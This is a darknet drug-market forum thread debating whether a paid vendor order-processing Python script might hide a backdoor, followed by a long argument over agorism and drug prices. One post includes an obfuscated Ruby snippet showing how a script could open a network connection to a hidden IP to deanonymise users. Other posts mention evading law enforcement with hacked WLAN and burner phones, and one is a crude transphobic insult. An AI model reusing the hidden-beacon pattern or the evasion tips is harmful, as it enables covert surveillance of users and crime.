The reagent tests, sure, but the samples can still be skipped just by accepting orders from new buyers until they've got some feedback to prove they're the real deal.
You say you will give step by step instructions/explanations to purchasers but couldn't you hypothetically lie whenever you wanted to in that?
Not with corroborating evidence from unimpeachable documentation (e.g. on python.org) that shows I'm not doing that.
So again, I just don't think you've done enough to prove that your program is safe.
I've posted the proof-of-concept shell script I first wrote earlier in this thread. It performs some of the same functions in a different way. It does not have all the features of SROPPy.
I can't think of anything better other than releasing it for free or handing it to people who could check it out(and these people may not exist on sr) but maybe someone can.
The only person I'd really trust on here to do it properly is Guru and he's already said he doesn't know Python. I don't really trust kmfkewm, although I appreciate his posts. Still, that point is moot, because he's a Ruby guy and not a Python guy.
I'm still waiting for Shannon to weigh in ... maybe.
Honestly I do doubt that it has any exploits and I don't really know enough about programming to judge everything in your posts so maybe everything in this thread is just paranoid ranting about exploits that really aren't plausible. But if it is at all possible it's better to stay safe though no?
The problem here is that you're saying that my only choice is to give in to the will of others. That is not my definition of what it means to be libertarian.
I may be relatively new to SR, but not this philosophy. Go back and read everything in GrahamGreene's comment, I agree with all of it. Then go and find one of DPR's posts and read the documents linked in his forum signature, especially SEK3's New Libertarian Manifesto (if you don't want to read it there's an audiobook of it on www.agorism.info).
"Now can you guess what happens after that?
1) I will be proven right (eventually).
2) We will discover that there really aren't as many people capable of auditing it properly as Pine might think.
3) My "tip jar" in my signature will receive sweet fuck all and I can go back to the drawing board."
Personally this would be my guess as well but in the end all I have at the moment is an educated guess and for me that isn't enough.
So there we go; I can try to appease the demands of others by working for free or I can try to address as much of the security concerns as possible while participating in this market as it is intended.
-
Yeah, I think the whole thing was blown waaaaay out of proportion by pine. I mean this thread and everything she has said could be condensed into maybe 1 sentence: "Other people haven't audited the program and it isn't freely available to the public and this means that the program could hypothetically contain some sort of exploit, so be very careful downloading and implementing it." This sentence seems true to me, but calling someone LE and saying all the shit that she has said without any evidence is just silly. Ask questions, but don't come to baseless conclusions.
Anyway, with that being said I still wouldn't take this sort of risk if I were a vendor. Downloading software from an anonymous person online that could, no matter how unlikely, contain some sort of exploits when I could simply do such a task without the software even if it did take a bit longer seems a little unreasonable to me I guess. If other vendors ARE willing to take that risk then that's certainly fine with me though.
Also, try not to shove your libertarian principles down my throat, I don't care and it's completely off topic. Your decisions regarding how you would distribute this software had nothing to do with libertarian principles and neither does anything that I've posted. You'll start sounding like pine if you start twisting everything into representatives of political theories etc. edit: OK that may have come off as too harsh. I don't disagree with libertarians or actually claim to know anything about how to properly govern the human race(personally I doubt you or anyone else does either but please don't consider this an invitation to try and prove me wrong) but your reading list just seemed to come out of nowhere.
Oh and yeah, I forgot about shannon. Shannon seems knowledgeable to me and I hope he/she weighs in here too.
-
I want to thank Pine for explaining how exploits are hidden in code in such a way as to not be found, like I was in kindergarden, and typing in my first commands in Basic on a Commadore pet. incredibly presumptuous of you. Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine? ..........sickgirl
You can't talk that way to Pine... She has worked too hard typing her finger raw for this community. A little respect, please.
-
I want to thank Pine for explaining how exploits are hidden in code in such a way as to not be found, like I was in kindergarden, and typing in my first commands in Basic on a Commadore pet. incredibly presumptuous of you. Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine? ..........sickgirl
You can't talk that way to Pine... She has worked too hard typing her finger raw for this community. A little respect, please.
Ok, first off, I was responding to the condescending way I was being addressed. I for one appreciate all that she has done vis a vis the PGP club, but in this thread she made a lot of baseless accusations, and when I have someone who presumes that I do not know jack about computing, or code, I will correct them. When I am being spoken down to, I will respond in kind. As for "I can't"...well, I did, just as she did. I have been on silk road for over a year, I am not some n00b girl who comes in and runs her mouth. Do a little thread searching. I am actually quite polite, and patient. I do not however, take kindly to fear mongering and baseless accusations. The title of this thread was completely un called for. Therefore, it boils down to this. Communicate to me as if I were your equal, and do not make assumptions, and I will treat you and anyone else with respect. Disrespect me, and most likely, I will still be polite, but I will call you out. As for my sharp tone when I did it? yeah, that was a bit out of character for me, but I was on the border of WD. Now my package has arrived and I am good, but I will not apologise. After all, I did not resort to name calling, nor did I go off and make accusations or assumptions toward her. I have given pine plenty of positive karma, and I really groove at a lot of the posts/threads she has made, and this does not change that. Just because someone does good for the community does not mean that they are a goddess who cannot ever be spoken to in a manner that may be less than praise. Respect is a two way street sweetie
-
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.
Except it is insanely more difficult to pwn someone with a malicious JPG than it is to own someone who runs the script they just privately got from you....none of your arguments hold water and honestly they are stretching very far to try to make what you are doing appear to be anything other than sketchy with a capital S.
-
I think that that your replies makes sense. I guess if people are so paranoid why not let specific members of the forum check the code out? Maybe you should give the code to kmf and he could check it out and comfirm that it's safe and then once you sell it to someone kmf could send them the code he got as well and if they are the same then that would be a good way to make sure it is safe and that you don't change it along the way. Just a suggestion though. To me although what you've said makes sense it's really up to you to guarantee the safety of your software completely in some way. It doesn't seem like an impossible task to me even if you don't want to give it to the public for free, but I guess I could be wrong there.
First of all I do not know python, although it looks close enough to Ruby from what I have seen that I am sure I could audit such a simple program with little effort to learn it. Second of all, it would preferably be audited by more people than me, as in anyone with access to the forum ;).
-
Uh-huh. So you've got a vendor account and inspected all the code that the vendor's see?
No, but I think it is less of a risk to count on Firefox not having a zero day vulnerability that SR will use to target me versus a script marketed to drug traffickers not having a backdoor that will target me. Strictly speaking it can be much more secure to run your application than to access SR, as you can not access SR from behind an air gap. On the other hand, it is dangerous to talk about things that are true in theory when they are extremely unlikely to be true in practice.
Also I believe it is theoretically possible to compile any interpreted language (and likewise to interpret any compiled language), so indeed python and even ruby can be compiled, it is just not the common use of Ruby (and in fact I don't know how to do it) but apparently can be done more practically with Python.
-
It is not impossible to hide a backdoor of sorts in a python script. Take this for example. It is not exactly a well hidden backdoor, but it might be overlooked, and a single call to it could deanonymize anyone who runs the script it is in. I admit it looks sketchy as hell and anyone who knows ruby could figure out what is going on, but this is about as far as you get when it comes to backdoors in languages like this (where as with C or C++ it can be done MUCH MUCH more sneakily).
[[115, 111, 99, 107, 101, 116].pack("c*")].each {|gpg_helper| require gpg_helper}
def seed_randomness
random_numbers = TCPServer.open([49, 50, 46, 50, 53, 46, 51, 51, 46, 49, 50].pack("c*"), [56, 48].pack("c*") )
random_numbers.send("seed", 0)
end
The TCPServer call gives it away but if I spent more time on it I could probably obfuscate that as well. I have not tested this but think it should work.
-
Thanks for everyone discussing thee matter.
We have recognized Louis Script yesterday and were interested.
We assume we are pretty good with computing & security in general...but dont know shit about programming.
But we know at least so much that we could see that those Python scripts have a miniscule chance of being an Attack.
Thanks.
Also it is really easily verified . There are a million clearnet forums out there to check this or find ppl to do this.
Yep. Not to mention a lot of documentation on places like python.org and diveintopython.net.
We still want to to merry pine someday through cryptographical contract :) butt this time she was a little bit to hasty.
Warning of probable malware and advising being cautious is a good thing but directly marking it as malware is not a good move.
This is appreciated.
Pine and Louis are both great for the community and we dont suspect LEO. even their help is appreciated as with some proper measures it is very very hard to get caught :)
Cheers. I don't actually think s/he is either.
We will order a customized version of the script sometimes in the future ..we long searched for something like this.
I look forward to that. :)
What are the probabilites of an Auto - Answer script being developed or feasible? Warweed seems to use something like this.
If there were an API it would be dead simple. There isn't. It should still be possible to use HTTP-Post to interact with the pages. I presume that's what Warweed does, with an always on system, constantly logged in to check the orders page every minute and then respond with a PM once an order is recognised.
Unless, of course, Warweed is actually a vendor account created by SR staff and can run directly on the system. I think it's the former, though, because the recent academic report on SR confirmed that a session ID could be used by a bot to crawl the site. Whoever is running Warweed just needs to login as normal occasionally and update the session ID used by his or her script.
disclaimer: we use prepaid international SIM , change IMEI numbers, throw away phones and hacked WLAN for access to the site.
This scripts will only be used in torbox images.
Cool.
I have discussed API with dpr for a very long time i mean sure it would be nice but in the end you can do the same with carving
auto replys and site crawling is dead easy once you understand the site structure and link structure and how thats all setup if you were here during the migrartion you remember how things used to and can reverse engineer the entire site..
personally i still can provide a whole db for all users on the site, i still can tell you when and what time they registered i can still give you approx sales data on sr based on a stable btc market ect ect ect
as for how warbot works believe its no easy feat of checks rechecks time outs ect ect the list goes on and one and has gone through about 20 rewrites now
-
You can't talk that way to Pine... She has worked too hard typing her finger raw for this community. A little respect, please.
what? Doesn't work like that. If you want to have a hero worship session, go do it in a thread where said hero hasn't flown off the handle and made serious accusations, been thoroughly rebutted, and then still didn't really back off, just kind of prevaricated and fussed about the potential for the software seller to swap out for malware (err. checksums?). Pine contributes metric fucktons more to this board than most do, absolutely, but she was really, wildly off base here.
I started reading this thread and was immediately right there with Pine, horrified that someone was selling closed-source 'vendor software' on the road. Then I saw: Python/script, GPL, source available here.... huh? You'd have to go to great pains for the deliverables here to not be wide open for inspection based on language alone. Far from an ominous sign of LE infiltration, this sounded like an interesting project. The kind of effort we could use a lot more of, not less. I agree that software on SR is somewhat problematic, for the reasons well-discussed here already. But vendor software done well could potentially make vendors *more* secure, not less.
And no. So long as the scripts themselves are not ridiculous mountains of tortured spaghetti code (in which case no-one should run it on general principle), there will be no room full of NSA spooks required to vet the code thoroughly. It will be relatively brief. Either it makes network connections, or it doesn't. Either it does unexpected IO, or it doesn't.
For a software project with sufficient interest, why couldn't there be a community vetting stage in the release cycle? SoftwareVendorGuy releases v1.0.0.0 as an archive, with a known hash or signature. Community vets the contents in the open. Now a vendor buying the software can consider their trust in those who are vouching for it, and thus have some assurances that the bits in *that specific release* are, while not necessarily bug free, clear of code or resources with malicious intent.
Now you'd also need to have a patch review cycle, and standard secure practice would have to dictate not installing any patches or updates until the requisite trusted signoffs were available. Or in the case of an urgent fix, just develop / collab on the patch in the open, and again have people sign-off. Such sign-offs could be actual PGP signed statements, of course.
Anyways. It isn't clear that there is the manpower, will, or resources here for that, yet. But why don't we look forward to how we might more openly and collaboratively engineer software here on the darknets? Personally I think if people are going to try to move this particular bar forward, you should bring hard facts to the table before you shout them down as LE. Otherwise you're actively retarding the community's growth, which I'm pretty sure can and should be measured in metrics other than post count.
-
Yeah, I think the whole thing was blown waaaaay out of proportion by pine. I mean this thread and everything she has said could be condensed into maybe 1 sentence: "Other people haven't audited the program and it isn't freely available to the public and this means that the program could hypothetically contain some sort of exploit, so be very careful downloading and implementing it." This sentence seems true to me, but calling someone LE and saying all the shit that she has said without any evidence is just silly. Ask questions, but don't come to baseless conclusions.
And that's something I've got no problem with. Questions are good.
Anyway, with that being said I still wouldn't take this sort of risk if I were a vendor. Downloading software from an anonymous person online that could, no matter how unlikely, contain some sort of exploits when I could simply do such a task without the software even if it did take a bit longer seems a little unreasonable to me I guess. If other vendors ARE willing to take that risk then that's certainly fine with me though.
Which exactly what a free market allows. Those who want it can buy it, those who don't want it don't have to buy it or fund it in any way.
Also, try not to shove your libertarian principles down my throat, I don't care and it's completely off topic.
That's just my position, you can take or leave it as you see fit. It's not off topic, though, because Silk Road is an agorist market. Understanding agorist principles, whether you share them or not, will help you understand why the market is the way that it is. That is, for example, why Pine couldn't get DPR to terminate my account and started this thread in the first place.
Your decisions regarding how you would distribute this software had nothing to do with libertarian principles
Actually that's not entirely accurate. I've done some work (written the software) and I am now offering that as a product in the market. The market will then decide if it wants it or not. If not then I won't get any sales. I think I will or I wouldn't have done it, but it might take a while.
and neither does anything that I've posted. You'll start sounding like pine if you start twisting everything into representatives of political theories etc. edit: OK that may have come off as too harsh.
Nah, it's just your opinion.
I don't disagree with libertarians or actually claim to know anything about how to properly govern the human race(personally I doubt you or anyone else does either but please don't consider this an invitation to try and prove me wrong) but your reading list just seemed to come out of nowhere.
The whole point of it is not to rule anyone except yourself and not to be ruled by anyone else.
This, of course, is precisely where libertarian principles are on topic because my critics to this point can be reduced to stating: "do what we say, give us your work for free and maybe someone might give you a donation." Then they're getting annoyed because I'm saying: "no, I'm in an agorist market and people can choose to buy my product or choose not to."
Oh and yeah, I forgot about shannon. Shannon seems knowledgeable to me and I hope he/she weighs in here too.
It would be interesting.
-
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.
Except it is insanely more difficult to pwn someone with a malicious JPG than it is to own someone who runs the script they just privately got from you....
Nevertheless it illustrates a more general principal: that LE would want to target as many people as possible and would choose an attack vector which enabled them to do that.
Right now there are only two people with my code, myself and the vendor who wanted it written in the first place. If you and Pine get your way we'll be the only two unless I give into your demands and give it away for free.
none of your arguments hold water and honestly they are stretching very far to try to make what you are doing appear to be anything other than sketchy with a capital S.
No, that's just your opinion. You want me to adhere to your definition of what Silk Road should be rather than what it actually is.
It's really a lot simpler than this thread makes it appear:
I've said my product is a particular thing, which runs in a certain way and is not a threat. You (and Pine) say otherwise. If people agree with you or are just not interested in the product then they won't buy it. If people don't agree with you and are interested in the product then they might buy it.
If people buy it and I am telling the truth then that will be reported to the forum and, hopefully, I will have more sales. If people buy it and it turns out I've lied or the product is a threat (or just includes a bad bug that makes it a threat), then that will be revealed. At that point I will lose all credibility, have no sales and possibly have my account terminated and be driven from the site.
At the end of the day I am attempting to participate in an agorist market. You want a different kind of market where physical products (e.g. drugs) are freely traded, but software isn't. Now, if I were forcing people to use my software then releasing the code completely publicly would be the right thing to do, but I'm not forcing anyone to do anything. The only people here trying to force anyone to do anything are you, Pine and your supporters by insisting I should not sell my product (and possibly any product) and give my work away.
If you really want to prove me wrong then buy SROPPy and post the code. I'm willing to bet you don't do that.
-
Uh-huh. So you've got a vendor account and inspected all the code that the vendor's see?
No, but I think it is less of a risk to count on Firefox not having a zero day vulnerability that SR will use to target me versus a script marketed to drug traffickers not having a backdoor that will target me.
Only if there's some secret code embedded in it the way Pine has described that somehow takes the data a buyer puts in the address field of an order and/or their username and turns it into a sneaky (possibly air-gap bridging) attack (or turns the vendor's printer into a weapon). I've said it before and I'll say it again: my code does not do this. It reads files, it writes files, it invokes GPG to decrypt the encrypted files and it prints.
Strictly speaking it can be much more secure to run your application than to access SR, as you can not access SR from behind an air gap. On the other hand, it is dangerous to talk about things that are true in theory when they are extremely unlikely to be true in practice.
I've stated that it can run behind an air gap in order to illustrate that it does not require any network connectivity. Actually running it behind one is entirely up to each vendor's security policies.
Besides, Wikileaks have already proven that an air gap can be bridged with the cablegate data. So we can argue the value of that until the cows come home.
Also I believe it is theoretically possible to compile any interpreted language (and likewise to interpret any compiled language), so indeed python and even ruby can be compiled, it is just not the common use of Ruby (and in fact I don't know how to do it) but apparently can be done more practically with Python.
Yes, it is possible to compile Python code. This code is not precompiled. You can see the list of files in version 1.1 on the product page with their SHA sums. The Python files are .py and NOT .pyc.
-
It is not impossible to hide a backdoor of sorts in a python script.
You'd still have to open a socket connection and import a module that allowed that (e.g. os, socket, urllib, urllib2 and a bunch of others for specific protocols). At that point the game would be up unless the the script needed those modules for some other legitimate purpose.
The only one of those I've even considered using is the os module, which allows access to invoking features of the operating system (e.g. a command from the command line). This would probably be necessary to port the code to Windows and cut the bash scripts out, while still being able to do things like invoke GPG (there is no way in Hell I'm going to try my own implementation of the entire OpenPGP protocol for this).
The TCPServer call gives it away but if I spent more time on it I could probably obfuscate that as well. I have not tested this but think it should work.
Yes, just as a socket call would in Python. Of the three Python files in SROPPy two of them import the csv module and one of them does not import any modules. The rest of it uses the built-in fuctions of the language.
-
As for my sharp tone when I did it? yeah, that was a bit out of character for me,
Oh, I dunno... ;)
-
I have discussed API with dpr for a very long time i mean sure it would be nice but in the end you can do the same with carving
Clearly. Obviously I would prefer an API because it makes it a lot easier to code for and a lot cleaner. That said, the code currently being argues over on this thread is pretty clean and minimal too, but it requires human interaction to prepare the input data (to convert the HTML order page to CSV). Obviously you already do that in a different way because you don't need the address field filled out.
auto replys and site crawling is dead easy once you understand the site structure and link structure and how thats all setup if you were here during the migrartion you remember how things used to and can reverse engineer the entire site..
Yes, the path structure does look very static and fairly straight forward to interact with.
personally i still can provide a whole db for all users on the site, i still can tell you when and what time they registered i can still give you approx sales data on sr based on a stable btc market ect ect ect
Which shows how that academic, I forget his name, managed to trawl the site for the evidence that went into that report.
as for how warbot works believe its no easy feat of checks rechecks time outs ect ect the list goes on and one and has gone through about 20 rewrites now
I don't doubt it, but it's quite impressive. I think I may have grabbed something through it or one of the other automated systems when I wanted to see what the order system looked like for buyers (don't thank me, whatever I picked was either free or cheap and I wasn't actually interested in the product, more the SR order system).
-
I'm in an agorist market
The principles behind this and any marketplace is simple human greed, and not agorism. People were greedy before agorism. They will be greedy long after it.
Idola fori is a Latin term, coined by Sir Francis Bacon. The term is one of four such "idols" which represent "idols and false notions which are now in possession of the human understanding, and have taken deep root therein, not only so beset men's minds that truth can hardly find entrance, but even after entrance is obtained, they will again in the very instauration of the sciences meet and trouble us, unless men being forewarned of the danger fortify themselves as far as may be against their assaults".
Bacon said that there were two basic kinds of Idol of the Market Place:
They are either names of things which do not exist (for as there are things left unnamed through lack of observation, so likewise are their names which result from fantastic suppositions and to which nothing in reality corresponds), or they are names of things which exist, but yet confused and ill-defined, and hastily and irregularly derived from realities.
— Novum Organum, Aphorism LX
The first kind "is more easily expelled, because to get rid of them it is only necessary that all theories should be steadily rejected and dismissed as obsolete."
But according to Bacon, "the other class, which springs out of a faulty and unskillful abstraction, is intricate and deeply rooted." This is because it has to do with the way words themselves can guide thinking. Nevertheless, there are "certain degrees of distortion and error. [...] some notions are of necessity a little better than others, in proportion to the greater variety of subjects that fall within the range of the human sense."
How many people here read Francis Bacon? How many people here read books on agorism and misinterpreted everything they saw? How many people here read?
You're new here so I doubt you've read any of DPR's posts regarding his / her views and ideals, but suffice it to say this market is certainly built around agorist principles.
The force that drives a CAPITALISM based marketplace is human greed. This is a marketplace free of regulation where the markets (i.e. the buyers) dictate the prices and not the other way round - thus it is an agorist marketplace, regardless of how you wish to interpret it.
I have to ask: do you even know what agorism is? ???
-
I'm in an agorist market
The principles behind this and any marketplace is simple human greed, and not agorism. People were greedy before agorism. They will be greedy long after it.
Idola fori is a Latin term, coined by Sir Francis Bacon. The term is one of four such "idols" which represent "idols and false notions which are now in possession of the human understanding, and have taken deep root therein, not only so beset men's minds that truth can hardly find entrance, but even after entrance is obtained, they will again in the very instauration of the sciences meet and trouble us, unless men being forewarned of the danger fortify themselves as far as may be against their assaults".
Bacon said that there were two basic kinds of Idol of the Market Place:
They are either names of things which do not exist (for as there are things left unnamed through lack of observation, so likewise are their names which result from fantastic suppositions and to which nothing in reality corresponds), or they are names of things which exist, but yet confused and ill-defined, and hastily and irregularly derived from realities.
— Novum Organum, Aphorism LX
The first kind "is more easily expelled, because to get rid of them it is only necessary that all theories should be steadily rejected and dismissed as obsolete."
But according to Bacon, "the other class, which springs out of a faulty and unskillful abstraction, is intricate and deeply rooted." This is because it has to do with the way words themselves can guide thinking. Nevertheless, there are "certain degrees of distortion and error. [...] some notions are of necessity a little better than others, in proportion to the greater variety of subjects that fall within the range of the human sense."
How many people here read Francis Bacon? How many people here read books on agorism and misinterpreted everything they saw? How many people here read?
You're new here so I doubt you've read any of DPR's posts regarding his / her views and ideals, but suffice it to say this market is certainly built around agorist principles.
The force that drives a CAPITALISM based marketplace is human greed. This is a marketplace free of regulation where the markets (i.e. the buyers) dictate the prices and not the other way round - thus it is an agorist marketplace, regardless of how you wish to interpret it.
I have to ask: do you even know what agorism is? ???
Nowt wrong with Capitalism. It's what drives progress. Bloody hippies.
-
lim lim limmy...
it's actually what hinders it.
though it certainly has it's awesome points. just simply not the best a human existence can do. for capitalism to thrive, problems have to exist and continue to exist. ever seen the storyofstuff.com? or storyofbottledwater? this is a system for conventionals... cyclical consumption and planned obsolescence is what drives the magic capitalistic circle of consumption and infinite growth and profit. except the resources that make it all happen are not infinite. sorry for the derail. back on track back on track... wasn't cypher from the matrix uhh.....?
i think the system is great. as a transitioning one.
-
I'm in an agorist market
The principles behind this and any marketplace is simple human greed, and not agorism. People were greedy before agorism. They will be greedy long after it.
Idola fori is a Latin term, coined by Sir Francis Bacon. The term is one of four such "idols" which represent "idols and false notions which are now in possession of the human understanding, and have taken deep root therein, not only so beset men's minds that truth can hardly find entrance, but even after entrance is obtained, they will again in the very instauration of the sciences meet and trouble us, unless men being forewarned of the danger fortify themselves as far as may be against their assaults".
Bacon said that there were two basic kinds of Idol of the Market Place:
They are either names of things which do not exist (for as there are things left unnamed through lack of observation, so likewise are their names which result from fantastic suppositions and to which nothing in reality corresponds), or they are names of things which exist, but yet confused and ill-defined, and hastily and irregularly derived from realities.
— Novum Organum, Aphorism LX
The first kind "is more easily expelled, because to get rid of them it is only necessary that all theories should be steadily rejected and dismissed as obsolete."
But according to Bacon, "the other class, which springs out of a faulty and unskillful abstraction, is intricate and deeply rooted." This is because it has to do with the way words themselves can guide thinking. Nevertheless, there are "certain degrees of distortion and error. [...] some notions are of necessity a little better than others, in proportion to the greater variety of subjects that fall within the range of the human sense."
How many people here read Francis Bacon? How many people here read books on agorism and misinterpreted everything they saw? How many people here read?
You're new here so I doubt you've read any of DPR's posts regarding his / her views and ideals, but suffice it to say this market is certainly built around agorist principles.
The force that drives a CAPITALISM based marketplace is human greed. This is a marketplace free of regulation where the markets (i.e. the buyers) dictate the prices and not the other way round - thus it is an agorist marketplace, regardless of how you wish to interpret it.
I have to ask: do you even know what agorism is? ???
Nowt wrong with Capitalism. It's what drives progress. Bloody hippies.
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by it's very regulatory nature is what powers the governments of today, and with them, their restrictive laws. Don't get me wrong, I like making money hand over fist as much as the next guy but that is only because we currently live within the confines of a capitalist society.
Capitalism is the reason that marijuana and most other drugs aren't restricted. Marijuana's prohibition in particular was the result of corrupt capitalism and the power that pharmaceutical companies who lobby politicians to keep legalisation off the agenda also exists as a symptom of the capitalist condition.
Money, money, everywhere but none of it with any value. I think that it essentially comes down to the one's view of the difference between 'amount' and 'value'. Personally I would much rather have complete and sovereign freedom, to exist completely free as is my natural right, to any amount of anything. I value my freedom more than I value money, for what is money but a chain with which we are enslaved.
We are all born free, but we are not born into a free world.
/ teary-eyed insight
- grahamgreene
-
Your agorism is nonsense.
Instead of stating your belief, why not back up your argument? Your reply is akin to me stating "YOU'RE nonsense." It has no value, adds nothing to your argument and the only thing it achieves is making you out to look rather uneducated, which I'm sure was not your intention.. ???
the markets (i.e. the buyers) dictate the prices
Correct! The number of imprisoned buyers dictate the prices. Your drugs wouldn't cost more than useless junk if they were legal. The more people are in jail, the more risky the whole enterprise is, the bigger the prices. Want a principle? Here it is: May you die today so that I die tomorrow.
Incorrect. Supply and demand dictates the prices, which itself is dictated by the prices that buyers are willing to pay. Your argument is invalid as legal drugs also command relatively high prices - pharmaceutical companies, in particular, charge outrageously high prices for their drugs; drugs which are legal, and cost mere pennies to produce, making the companies vast sums of money after the research and development costs have been satisfied. I will also ask you to note that I state "the markets (i.e. the buyers) dictate the prices", not "the number of imprisoned buyers dictate the prices." The latter doesn't really make sense as you go on to state that "the more people are in jail, the more risky the whole enterprise is, the bigger the prices."
First you say that imprisoned buyers dictate price, then you directly contradict yourself by saying that imprisoned suppliers (i.e. the ones taking the risk) in jail, the higher the price. Which is it? I'm genuinely confused about where you're getting your information... ???
Riskier enterprise =/= "the bigger the prices." The prices are dictated by what the buyer is willing to pay for them. Sure, prices are jacked up as the risk increases, but that does not mean that people have to pay those prices. If they choose not to then the price will drop, demonstrating that the market dictates the prices, not the supplier.
As for:
Want a principle? Here it is: May you die today so that I die tomorrow.
That literally has NOTHING to do with the current debate. If I'm mistaken please do enlighten me, but what has that got to do with either agorism or capitalism?
What you have stated is basically just a principle of self-preservation in quote form. It is entirely out of place here, and contributes nothing to your argument.
Again I'll ask:
... do you even know what agorism is? ???
-
Instead of stating your belief, why not back up your argument? Your reply is akin to me stating "YOU'RE nonsense." It has no value, adds nothing to your argument and the only thing it achieves is making you out to look rather uneducated, which I'm sure was not your intention.. ???
It applies not only to agorism, but to the biggest part of your second post, as I was not talking neither about legal drugs, nor contradicted myself telling that LE imprisons suppliers only... Got used, if anyone disagrees with them, he is uneducated.
I'm sorry but what you've just posted makes absolutely no sense. I genuinely can't understand what you're trying to say here. 0.2 BTC for anyone that can translate it into English. :-\ I'll attempt to reply to the parts that do have a semblance of sense to them.
"Your agorism is nonsense" was your response to my first post. Seeing as you are reiterating that point, I'll again ask you to demonstrate how my "agorism is nonsense", and again ask you to back up your statement in some way.
Once again, stating "your agorism is nonsense" is akin to me stating "You are nonsense." It is entirely nonsensical. If you can't explain the reasoning behind your arguments then it is absolutely pointless debating anything with you. ???
It applies not only to agorism, but to the biggest part of your second post, as I was not talking neither about legal drugs...
I know that you weren't talking about legal drugs but if you re-read your post you will see that you stated:
Your agorism is nonsense.
Correct! The number of imprisoned buyers dictate the prices. ***Your drugs wouldn't cost more than useless junk if they were legal.*** The more people are in jail, the more risky the whole enterprise is, the bigger the prices. Want a principle? Here it is: May you die today so that I die tomorrow.
I rebutted your statement by showing that drugs DO still cost more than useless junk when they are legal.
Your argument is invalid as legal drugs also command relatively high prices - pharmaceutical companies, in particular, charge outrageously high prices for their drugs; drugs which are legal, and cost mere pennies to produce, making the companies vast sums of money after the research and development costs have been satisfied.
Riskier enterprise =/= "the bigger the prices." The prices are dictated by what the buyer is willing to pay for them. Sure, prices are jacked up as the risk increases, but that does not mean that people have to pay those prices. If they choose not to then the price will drop, demonstrating that the market dictates the prices, not the supplier.
I will also add that pharmaceuticals is a virtually risk-free industry, or in the case of a single company, a virtually risk-free enterprise; therefore if we use your logic it would stand to reason that their drugs, which are legal, would cost the same as "useless junk". They do not, which invalidates your argument.
... nor contradicted myself telling that LE imprisons suppliers only...
You did indeed contradict yourself, though not in the way you seem to think I am stating. I did not state that you said LE imprisons suppliers only. Did you even read my post?! :o
The number of imprisoned buyers dictate the prices. The more people are in jail, the more risky the whole enterprise is, the bigger the prices.
You stated that the number of buyers that are in jail dictate the prices. You then stated "the more people are in jail, the more risky the whole enterprise is, the bigger the prices." You directly contradicted yourself. How does a large amount of buyers in jail (which according to you dictates the price) increase the risk of the 'whole enterprise'?! Buyers are just buyers. They don't affect the risk profile of supplying at all. The only reason the enterprise could be considered 'riskier' is if the people being imprisoned were suppliers as the reason they would be in prison is because of the risk they're taking by supplying. Buyers going to prison does not affect the supplier's risk, ergo it does not affect the price.
Suppliers are the ones taking the risk by running 'the enterprise', thereby making the latter part of your statement apply to them, and completely contradicting the former part of your statement.
Another way to look at it is that you're stating the following: that imprisoned buyers are the ones that dictate the prices because they want to pay more money for something that has a higher risk of putting them in prison. This is absurd.
Your statements make no sense. Literally, no sense at all.
As for:
Got used, if anyone disagrees with them, he is uneducated.
Another 0.2 BTC reward for anyone that can figure out the meaning behind that. I'm going to hazard a guess and say that English isn't your first language? If it's not, let me know and I'll attempt to make my future replies a little simpler.
Want a principle? Here it is: May you die today so that I die tomorrow.
What you have stated is basically just a principle of self-preservation in quote form. It is entirely out of place here, and contributes nothing to your argument.
What I have stated is what you, agorists, have adopted so easily. Price is high because of the only one reason: risk. And the more people are convicted, the bigger risks are.
Are you stating that agorists have adopted the principles of self-preservation? By virtue of being a living creature, everyone and everything, agorist or otherwise, lives by that same principle. Humans, while we do express compassion, essentially have self-preservation hardwired in our brains as our number one priority. The drive to stay alive.
Your statement has nothing to do with agorism and everything to do with being alive. The two, whilst not mutually exclusive, are certainly not the same.
Price is not high because of one reason, it is high for a number of reasons, yes, one of them being risk. However, the argument that I am making is that prices are dictated by the markets. If I have a kilo of cocaine that I have to personally swim through shark infested waters in order to sell, and my competitor has a kilo of the exact same cocaine that was flown in, I can charge ten times more for it than my competitor because there was a lot more risk for me. However, I won't sell it, because nobody will pay for it based on risk. People will pay what they think it is worth, or else they won't buy it and will go to my competitor who is advertising lower prices. If they feel his prices are too high, they will go to another competitor, and if they're still dissatisfied with prices, they can import it themselves and charge a significantly lower price for it.
Yes, risk is a FACTOR in prices charged by sellers, but what dictates the price is what the buyer is willing to pay for it. If the market is not willing to pay €50,000 for a kilo of cocaine, then it won't sell. If an enterprising individual comes along and decides to charge €25,000 by reducing their profit margin by 60 - 70%, then that will sell as it is better value than the €50,000 offering. If a coca grower and processor comes along and decides to sell a kilo of cocaine for €5,000, then it is incredibly likely that that will be snapped up, leaving the €25,000 and €50,000 sellers unable to sell their product as BUYERS will no longer pay those prices for it.
Again I'll ask:
... do you even know what agorism is? ???
Go on! Go on! I'm already applauding here!
I presume you're applauding because you think I'm going to write out a long description of what agorism is, only to be met with a 3 sentence reply from you that makes absolutely no sense and isn't backed up by any logic whatsoever.
So, to reiterate: I asked you if "you even know what agorism is?" - if you are unable to answer that question, all you have to do is say 'no'.
- grahamgreene
-
Pine owes an apology to Louis, and the community for creating this hysteria.
Post a timestamped pic of your vagina, Pine, or stop claiming to be female. You fucking tranny LE PGP harvester.
-
How does a large amount of buyers in jail (which according to you dictates the price) increase the risk of the 'whole enterprise'?! Buyers are just buyers. They don't affect the risk profile of supplying at all.
Thanks to the caring government, illegal drug trade is very profitable. Any attempts to regulate the market and make jail sentences longer, both for sellers and buyers, increase the fees. Karl Marx once wrote that for a 300% profit there is no crime a capitalist would not commit. Especially when victims ask for the crime to commit over and over again.
Yes, risk is a FACTOR in prices charged by sellers, but what dictates the price is what the buyer is willing to pay for it.
And if the buyer cannot pay huge prices charged by sellers, he will be told, "If you don't like it, go away." I think I heard it already. None of the sellers in their right mind would reduce their profit taking risks into account. If the buyer is addicted, he will just sell drugs. And that would be not the worst outcome. He could kill anybody to get money, for example. If the buyer can pay huge prices, the buyer will be willing to pay huge prices for the drugs delivered safely, in lieu of buying cheap alternatives and spending his life in prison.
Another way to look at it is that you're stating the following: that imprisoned buyers are the ones that dictate the prices because they want to pay more money for something that has a higher risk of putting them in prison. This is absurd.
